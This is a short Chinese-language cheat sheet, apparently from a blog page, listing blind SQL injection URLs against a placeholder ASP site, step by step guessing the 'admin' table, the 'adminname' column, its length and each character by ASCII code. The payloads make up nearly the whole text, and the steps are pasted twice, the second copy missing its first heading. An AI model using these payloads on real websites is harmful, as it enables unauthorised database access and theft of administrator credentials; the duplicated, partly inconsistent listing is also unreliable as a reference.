1.猜解表名:
http://xxx.com/test.asp?id=123 and (select count(*) from admin)>=0//猜解是否有表admin
2.猜解字段名:
http://xxx.com/test.asp?id=123 and (select count(adminname) from admin)>=0//admin表中是否有字段adminname
3.猜解字段长度:
//从admin表中选取第一条记录,来获取这条记录的adminname字段长度
http://xxx.com/test.asp?id=123 and (select top 1 len(adminname) from admin)>=0
http://xxx.com/test.asp?id=123 and (select top 1 len(adminname) from admin)=7//字段adminname长度为7
4.猜解字段值:
//从admin表中选取第一条记录,逐个猜解字段adminname的值,直到7个
http://xxx.com/test.asp?id=123 and (select top 1 asc(mid(adminname,1,1)) from admin)=97
http://xxx.com/test.asp?id=123 and (select top 1 asc(mid(adminname,2,1)) from admin)=78
http://xxx.com/test.asp?id=123 and (select top 1 asc(mid(adminname,3,1)) from admin)=96
..........
http://xxx.com/test.asp?id=123 and (select top 1 asc(mid(adminname,7,1)) from admin)=102
http://xxx.com/test.asp?id=123 and (select count(*) from admin)>=0//猜解是否有表admin
2.猜解字段名:
http://xxx.com/test.asp?id=123 and (select count(adminname) from admin)>=0//admin表中是否有字段adminname
3.猜解字段长度:
//从admin表中选取第一条记录,来获取这条记录的adminname字段长度
http://xxx.com/test.asp?id=123 and (select top 1 len(adminname) from admin)>=0
http://xxx.com/test.asp?id=123 and (select top 1 len(adminname) from admin)=7//字段adminname长度为7
4.猜解字段值:
//从admin表中选取第一条记录,逐个猜解字段adminname的值,直到7个
http://xxx.com/test.asp?id=123 and (select top 1 asc(mid(adminname,1,1)) from admin)=97
http://xxx.com/test.asp?id=123 and (select top 1 asc(mid(adminname,2,1)) from admin)=78
http://xxx.com/test.asp?id=123 and (select top 1 asc(mid(adminname,3,1)) from admin)=96
..........
http://xxx.com/test.asp?id=123 and (select top 1 asc(mid(adminname,7,1)) from admin)=102
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
